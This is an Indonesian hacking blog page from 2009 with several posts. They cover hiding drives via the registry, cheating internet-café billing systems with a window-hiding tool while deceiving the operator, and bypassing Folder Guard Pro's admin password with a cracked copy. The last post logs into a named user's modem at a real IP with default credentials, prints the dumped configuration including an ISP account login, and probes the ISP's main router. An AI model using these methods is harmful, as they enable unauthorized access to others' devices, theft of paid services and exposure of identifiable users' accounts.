kita sudah mendapatkan password administrator seperti yang telah <br />kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara <br />lain silakan anda temukan sendiri, selamat mencoba <br />Contoh lain2nya dibawah ini........... <br />1. Membuka MSConfig dari Windows Explorer <br />Caranya: <br />C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe <br />2. Membuka Sysedit dari Windows Explorer <br />Caranya: <br />C:\Windows\System32\Sysedit.exe <br /><br />3. Membuka Task Manager <br />Caranya: <br />C:\Windows\System32\taskmgr.exe <br />4. Membuka Services.msc <br />Caranya: <br />C:\Windows\System32\services.msc <br />5. Membuka Disk Management System (Melihat Partisi Harddisk) <br />Caranya: <br />C:\Windows\System32\diskmgmt.msc <br />6. Membuka Computer Management Services <br />Caranya: <br />C:\Windows\System32\compmgmt.msc <br />7. Membuka Shortcut to desktop <br />Caranya: <br />C:\Windows\System32\Show Desktop <br />8. Membuka Defragment <br />Caranya <br />C:\Windows\System32\dfrg.msc <br /><br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/trik-jitu-ampuh-menghadapi-billing.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='1018944117029425447'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/menyembunyikan-drive-di-pc.html'>Menyembunyikan Drive di PC</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> sebenernya ga ada persipan khusus buat ngilangin drive di PC km, cuma ngerubah registry aja kok, berarti yang kamu butuhkan just only PC yang pake OS Win XP (all SP) n Win ME, (kalo di 98 blm dicoba). itu aja......<br /><br />Nah skr ikutin langkah2 nya:<br /><br /><span class="fullpost"><br />1. Klik tombol START trus lo pilih RUN di jendela RUN tadi itu lo ketik "Regedit" (gak pake tanda kutip)<br /> 2. Nah skr lo dah di jendela Registry Editor, trus cari HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer<br />3. Buka folder EXPLORER tadi, trus klik kanan di area kosong di panel bagian kanan, klik NEW trus klik DWORD Value, trus beri nama NoDrives<br />4. klik ganda NoDrives tadi, trus ubah angka di value data nya sesuai dgn drive mana yg mau lo ilangin, ni angka bwt ngilangin drive nya: <br /><br />Drive A = 1 Drive H = 128 Ngilangin semua drive = 67108863 <br />Drive B = 2 Drive I = 256<br />Drive C = 4 Drive J = 512<br />Drive D = 8 Drive K = 1024<br />Drive E = 16 Drive L = 2048<br />Drive F = 32 Drive M = 4096<br />Drive G = 64 Drive N = 8192<br />5. kalo udah, close registry editornya trus restart PC nya...!!<br /><br />6. kalo udah lo restart buka My Computer trus liat, ga ada kan drive yang dah lo ilangin tadi....<br /><br />7. tenang aja semua data yang ada di drive tadi aman kok.....suerrr!!!! <br /><br />==============================================<br />CARA NGEMBALIIN KE SEPERTI SEMULA:<br /><br />1. ikuti langkah diatas (no 1 ampe no 2) yach!!!!!<br /><br />2. Buka folder EXPLORER nya, trus cari NoDrives nya <br /><br />3. Nah di jendela NoDrives, rubah Value Data yang tadinya 4 (misal: untuk drive C) atau angka drive yang dah lo masukin, trus ganti jadi 0 (nol), atau hapus aja langsung nama file NoDrives tadi <br /><br />4. Restart tuch PC, and than liat aja di my computer drive yang diilangin tadi pasti udah ada......<br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/menyembunyikan-drive-di-pc.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='8132894102388266525'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/mencurangi-hampir-semua-jenis-billing.html'>Mencurangi (hampir) Semua Jenis Billing Warnet</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga. <br /><br />Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi <br />Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.<br />Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)<br />Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!<br /><br /><br /><span class="fullpost"><br />Penasaran mau tau caranya ? Baca aja sampai habis ! <br />Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya? <br /><br />Ini dia caranya ...<br />Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.<br />Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan <br /><br />Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.<br /><br />Yang harus disiapkan:<br />1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.<br /><br /><br /><br />Langkah-langkahnya:<br /><br />01. Masuk warnet dan pasang muka bego biar ga dicurigai operator<br />02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.<br />03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.<br />04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.<br />05. Saat masuk login screen, login aja seperti biasa.<br />06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.<br />07. Setelah ZHider dijalankan langsung aja logout.<br />08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!<br />09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.<br />10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana <br />11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.<br />12. Logout. SIapkan muka bego, lalu bayar tarif.<br /><br />Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.<br /><br />Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider<br /><br />CTRL+ALT+Z Menyembunyikan jendela aktif<br />CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan<br />CTRL+ALT+L Menampilkan dialog zhider<br />CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.<br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/mencurangi-hampir-semua-jenis-billing.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='2033152868986304871'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/menjebol-password-folder-guard-pro-52.html'>Menjebol Password FOLDER GUARD Pro 5.2</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Keamanan memang sangat penting melihat perkembangan teknologi informasi yang demikian pesat sekarang ini, namun teknologi kejahatan saat ini masih lebih unggul satu tingkat dibanding dengan pencegahannya. Tapi itu tidak menjadi landasan untuk kita bisa terus mengikuti perkembangan Teknologi security yang mungkin akan lebih maju.<br /><br />Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net. <br /><br />Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2. <br /><br /><br /><span class="fullpost"><br />Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save. <br /><br />Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi. <br /><br />Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.<br /> <br /><br /> <br />Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.<br /><br /><br />Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info. <br /><br /><br />Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey” /pw , isi nama shortcutnya dengan reset.<br /><br /> <br /> <br />lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset” berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem. <br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/08/menjebol-password-folder-guard-pro-52.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='965109098085084804'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/08/hacking-speedy.html'>Hacking Speedy</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Saya pernah merasa tertantang ada seorang anak di mirc Allnetwork merasa dirinya hebat lalu saya mencoba ceking ip nya rupanya percuma kita ddos karena IP dia random setiap sekali down ip dia ganti.<br /><br />Dan jangan lupa lagi bahwa setiap ID itu berdasarkan Line tlp setau saya seh begitu jadi kalau kita hack usernya sama aja jadi selusinya gimana Ya kita bobol server nya ihhiihihihih…<br />co_exmud is User10@125.164.72.124 * Ashof Yusiko<br />co_exmud on #surabaya #Malang<br /><br /><br /><span class="fullpost"><br />Saya akan mencoba masuk ke server dia karena saya lihat dari ident nya dia User10 berarti tidak jauh dia main di warnet dia user hehehe Allnet kan orangnya begitu tau dikit udah maju …. hi hi hi hi<br />setau saya semuanya user speedy memakai Modem kalau enngak salah ya, Jadi dia mempunyai web basic untuk meremote atau mensetnya..<br />http://125.164.72.124/ << bukak di IE anda masukan default dari pass modem PRolink seri itu Login : admin Password : password<br />Dam…. masuk kita ke modem mereka dah sekarang kita mau mendapatkan password dan Login nya kita dump ..<br />create user name admin passwd password root<br />size maxvc 8 max1483vc 8 maxppe 8 maxl2tptunnel 1 maxl2tpsesspertunnel 1 maxl2tppeerrws 4<br />modify system contact “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” model “H90″ location “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” vendor “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” logthresh 1 systime “Jan 01 01:01:08 1970″ timezone “GMT” magicnum 125<br />modify bridge mode enable<br />create pfraw rule entry ruleid 15 ifname private dir in act deny<br />create pfraw rule entry ruleid 16 ifname private act deny<br />create pfraw rule entry ruleid 17 ifname private dir in act deny<br />create pfraw rule entry ruleid 18 ifname private act deny<br />create pfraw rule entry ruleid 19 ifname private dir in act deny<br />create pfraw rule entry ruleid ifname private act deny<br />create pfraw rule entry ruleid 21 ifname private dir in act deny<br />create pfraw rule entry ruleid 22 ifname private act deny<br />create pfraw rule entry ruleid 23 ifname private dir in act deny<br />create pfraw rule entry ruleid 24 ifname private act deny<br />create pfraw rule entry ruleid 25 ifname private dir in act deny<br />create pfraw rule entry ruleid 26 ifname private act deny<br />create pfraw rule entry ruleid 27 ifname private dir in act deny<br />create pfraw rule entry ruleid 28 ifname private act deny<br />create pfraw rule entry ruleid 29 ifname private dir in act deny<br />create pfraw rule entry ruleid 30 ifname private act deny<br />create pfraw rule entry ruleid 31 ifname private dir in act deny<br />create pfraw rule entry ruleid 32 ifname private act deny<br />create pfraw rule entry ruleid 33 ifname private dir in act deny<br />create pfraw rule entry ruleid 34 ifname private act deny<br />create pfraw rule entry ruleid 35 ifname private dir in act callmgmt<br />create pfraw rule entry ruleid 36 ifname dmz dir in act callmgmt<br />create pfraw rule entry ruleid 37 dir in act callmgmt<br />create pfraw subrule entry ruleid 15 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864<br />create pfraw subrule entry ruleid 16 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864<br />create pfraw subrule entry ruleid 17 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF<br />create pfraw subrule entry ruleid 18 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF<br />create pfraw subrule entry ruleid 19 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035<br />create pfraw subrule entry ruleid subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035<br />create pfraw subrule entry ruleid 21 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B<br />create pfraw subrule entry ruleid 22 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B<br />create pfraw subrule entry ruleid 23 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC<br />create pfraw subrule entry ruleid 23 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0<br />create pfraw subrule entry ruleid 24 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC<br />create pfraw subrule entry ruleid 24 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0<br />create pfraw subrule entry ruleid 25 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138<br />create pfraw subrule entry ruleid 26 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138<br />create pfraw subrule entry ruleid 27 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000<br />create pfraw subrule entry ruleid 28 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000<br />create pfraw subrule entry ruleid 29 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806<br />create pfraw subrule entry ruleid 30 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806<br />create pfraw subrule entry ruleid 31 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333<br />create pfraw subrule entry ruleid 32 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333<br />create pfraw subrule entry ruleid 33 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100<br />create pfraw subrule entry ruleid 34 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100<br />create pfraw subrule entry ruleid 35 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864<br />create pfraw subrule entry ruleid 36 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864<br />create pfraw subrule entry ruleid 37 subruleid 1 mask 0xFF offset 15 enable cmpt eq 0xA7<br />create ipf rule entry ruleid 1002 dir in act accept destaddr eq 255.255.255.255 transprot eq num 17 destport eq num 67 seclevel high<br />create ipf rule entry ruleid 1010 dir in destaddr bcast seclevel high<br />create ipf rule entry ruleid 10 dir in destaddr eq 255.255.255.255 seclevel high<br />create ipf rule entry ruleid 1030 ifname private dir in act accept storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1040 ifname private dir out act accept srcaddr self storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1050 ifname private dir out act accept transprot eq num 17 destport eq num 53 inifname dmz storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1060 ifname private dir out act accept transprot eq num 6 destport eq num 53 inifname dmz storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1070 ifname private dir out act accept transprot eq num 6 destport eq num 25 inifname dmz storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1080 ifname private dir out act accept transprot eq num 6 destport eq num 110 inifname dmz storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1090 ifname private dir out act accept transprot eq num 6 destport eq num 21 inifname dmz storestate enable seclevel medium low<br />create ipf rule entry ruleid 1100 ifname private dir out act accept transprot eq num 6 destport eq num 80 inifname dmz storestate enable seclevel medium low<br />create ipf rule entry ruleid 1110 ifname private dir out act accept transprot eq num 6 destport eq num 23 inifname dmz storestate enable<br />create ipf rule entry ruleid 11 ifname private dir out act accept transprot eq num 1 inifname dmz storestate enable<br />create ipf rule entry ruleid 1130 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname private seclevel high<br />create ipf rule entry ruleid 1140 ifname dmz dir out transprot eq num 17 destport eq num 53 inifname public seclevel high<br />create ipf rule entry ruleid 1150 ifname dmz dir out transprot eq num 6 destport eq num 53 inifname public seclevel high<br />create ipf rule entry ruleid 1160 ifname dmz dir out transprot eq num 6 destport eq num 21 inifname public seclevel high<br />create ipf rule entry ruleid 1170 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname public seclevel high medium low<br />create ipf rule entry ruleid 1180 ifname dmz dir out transprot eq num 1 inifname public seclevel high medium<br />create ipf rule entry ruleid 1190 ifname public dir out transprot eq num 6 destport eq num 23 seclevel high<br />create ipf rule entry ruleid 10 ifname public dir out act accept srcaddr self storestate enable seclevel high medium low<br />create ipf rule entry ruleid 1210 ifname public dir in destaddr bcast seclevel medium<br />create ipf rule entry ruleid 12 ifname public dir in destaddr eq 255.255.255.255 seclevel medium<br />create ipf rule entry ruleid 1230 ifname public dir in transprot eq num 17 destport eq num 7 seclevel high medium<br />create ipf rule entry ruleid 1240 ifname public dir in transprot eq num 17 destport eq num 9 seclevel high medium<br />create ipf rule entry ruleid 1250 ifname public dir in transprot eq num 17 destport eq num 19 seclevel high medium<br />create ipf rule entry ruleid 1260 ifname public dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium low<br />create ipf rule entry ruleid 1270 ifname public dir in destaddr self transprot eq num 17 destport eq num 53 seclevel high<br />create ipf rule entry ruleid 1280 ifname public dir in destaddr self transprot eq num 6 destport eq num 53 seclevel high<br />create ipf rule entry ruleid 1290 ifname public dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium low<br />create ipf rule entry ruleid 1300 ifname public dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium low<br />create ipf rule entry ruleid 1310 ifname public dir in destaddr self transprot eq num 1 seclevel high medium<br />create ipf rule entry ruleid 13 ifname public dir in act accept destaddr self transprot eq num 17 destport eq num 53 storestate enable seclevel medium low<br />create ipf rule entry ruleid 1330 ifname public dir in act accept destaddr self transprot eq num 6 destport eq num 53 storestate enable seclevel medium low<br />create ipf rule entry ruleid 1340 ifname public dir in seclevel high isipopt yes<br />create ipf rule entry ruleid 1350 ifname public dir in seclevel high isfrag yes<br />create ipf rule entry ruleid 1360 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium<br />create ipf rule entry ruleid 1370 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium<br />create ipf rule entry ruleid 1380 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium<br />create ipf rule entry ruleid 1390 ifname dmz dir in act accept storestate enable seclevel high medium low<br />modify ipf global pubdefact accept pvtdefact deny dmzdefact accept<br />modify dhcp server cfg enable<br />create dhcp server pool start-ip 192.168.1.3 poolid 0 end-ip 192.168.1.34 mask 255.255.255.0<br />modify snmp trap disable<br />create rip intf ifname ppp-0<br />create ethernet intf ifname eth-0 ip 192.168.1.1 mask 255.255.255.0<br />create usb intf ifname usb-0 ip 192.168.1.2 mask 255.255.255.0<br />modify ip cfg ttl 64<br />modify dsl config adsl2plusauto annex adsl2plus framing-3et maxbits 15 rxstart 6 rxend 511 duallatency disable ecfdmmode ec maxdnrate 0×1ff autosraenable disable advcapability annexa adsl2 adsl2plus t1413<br />create atm port enable ifname atm-0 maxvc 8 oamsrc 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF<br />create ppp security ifname default<br />create ppp security ifname ppp-0 login 1527050063@telkom.net passwd (saya Hidden) he he he kasihan nanti<br />create atm trfdesc trfindex 0<br />create atm vc intf ifname aal5-0 lowif atm-0 vpi 0 vci 35 a5maxproto 2<br />create ppp intf ifname ppp-0 mru 1492 lowif aal5-0 droute true ppoe outside usedns true<br />modify nat global enable<br />create nat rule entry ruleid 1 napt<br />create alg port portno 21 prot num 6 algtype ftp<br />create alg port portno 1701 prot num 17 algtype l2tp<br />create alg port portno 1723 prot num 6 algtype pptp<br />create alg port portno 554 prot num 6 algtype rtsp<br />create alg port portno 7070 prot num 6 algtype ra<br />create alg port portno 7648 prot num 6 algtype cuseeme<br />create alg port portno 1719 prot num 17 algtype h323_ras<br />create alg port portno 17 prot num 6 algtype h323_q931<br />create alg port portno 6661 prot num 6 algtype mirc<br />create alg port portno 6662 prot num 6 algtype mirc<br />create alg port portno 6663 prot num 6 algtype mirc<br />create alg port portno 6664 prot num 6 algtype mirc<br />create alg port portno 6665 prot num 6 algtype mirc<br />create alg port portno 6666 prot num 6 algtype mirc<br />create alg port portno 6667 prot num 6 algtype mirc<br />create alg port portno 6668 prot num 6 algtype mirc<br />create alg port portno 6669 prot num 6 algtype mirc<br />create alg port portno 161 prot num 17 algtype snmp<br />create alg port portno 407 prot num 17 algtype timbuktu<br />create alg port portno 6301 prot num 17 algtype sgicompcore<br />create alg port portno 1863 prot num 6 upnpaware true algtype msnmsgr<br />create alg port portno 389 prot num 6 algtype ldap<br />create alg port portno 1002 prot num 6 algtype ldap<br />create alg port portno 500 prot num 17 algtype ike<br />create alg port portno 0 prot num 50 algtype esp<br />create alg port portno 1503 prot num 6 upnpaware true algtype t1<br />create alg port portno 5060 upnpaware true algtype sip<br />create alg port portno 5190 prot num 6 algtype icq<br />create bridge port intf ifname eth-0<br />modify stp port info ifname eth-0 priority 0×80 pcost 100<br />create dhcp relay intf ifname ppp-0<br />create igmp intf ifname ppp-0 host<br />modify autodetect cfg prot ppoe eoa<br />modify upnp cfg nbstatus enable<br />modify ilmi access protocol ifname atm-0 vpi 0 vci 35 proto any<br />trigger ilmi<br />END<br />Dah Di atas tersebut hasil dump saya tidak bisa menunjukan bagaimana cara dump tsb karena saya takut kawan kawan yang mempunyai etika jelek merusak atau menyalah gunakan dari artikel ini..<br />oke sekarang kan logikanya satu line satu user jadi enngak mungkin kita masuk ke user mereka sekarang kita cobak tembus ke main routernya atau server utama Gateway mereka.<br />C:\>tracert www.malanghack.net<br />Tracing route to malanghack.net [2.67.10.157]<br />over a maximum of 30 hops:<br />1 <1 ms <1 ms <1 ms 192.168.1.1<br />2 69 ms 66 ms 65 ms 1.subnet125-164-96.speedy.telkom.net.id [125.164.96.1]<br />3 69 ms 64 ms 66 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]<br />4 83 ms 96 ms 87 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8<br />.]<br />5 81 ms 79 ms 79 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67<br />.10.157]<br />Trace complete.<br />C:\><br />Anda bisa lihat saya mencoba meminjam modem dan mencoba di rumah saya hasil nya kita dapat konek dengan access speedy unlimite he he he he<br />125.164.96.1 << ini gateway nya tapi ini kek nya GW untuk personal alias Rumahan<br />oke bentar saya tanyak ama kawan yang pakai speedy di warnetnya.<br />Hadi: gus<br />Hadi: ketik nang dos koyok wingi<br />juss_orange: hadir<br />juss_orange: woce<br />Hadi: tracert www.malanghack.net<br />Hadi: paste mrene<br />Hadi: endi cok<br />juss_orange: Tracing route to malanghack.net [2.67.10.157]<br />over a maximum of 30 hops:<br />1 <1 ms <1 ms <1 ms 192.168.0.1<br />2 <1 ms <1 ms <1 ms 192.168.1.1<br />3 53 ms 52 ms 53 ms 1.subnet125-164-127.speedy.telkom.net.id [125.164.127.1]<br />4 55 ms 52 ms 53 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]<br />5 521 ms 425 ms 82 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8.]<br />6 489 ms 838 ms 607 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67.10.157]<br />Hadi: oke thanks<br />Itu hasil di warnet jadi GW warnet 125.164.127.1 << ini he he he<br />sekarang kita cobak masuk ke router telkom pusat Gatewaynya<br />******************************************************* **<br />* All rights reserved (1997-04) &n bsp; *<br />* Without the owner’s prior written consent, *<br />*no decompiling or reverse-engineering shall be allowed.*<br />******************************************************* **<br />Login authentication<br />Password:<br />Note: The max number of VTY users is 5, and the current number<br />of VTY users on line is 1.<br /><BRASS-MLK><br />hehehe ITu main router dari 125.164.96.1 Gw personal sekarang kita cobak dari GW warnet apa sama ?<br />******************************************************* **<br />* All rights reserved (1997-04) &n bsp; *<br />* Without the owner’s prior written consent, *<br />*no decompiling or reverse-engineering shall be allowed.*<br />******************************************************* **<br />Login authentication<br />Password:<br />Note: The max number of VTY users is 5, and the current number<br />of VTY users on line is 1.<br /><BRASS-MLK><br />Ha ha ha ha rupanya sapa personal ama warnet<br /><BRASS-MLK>?<br />User view 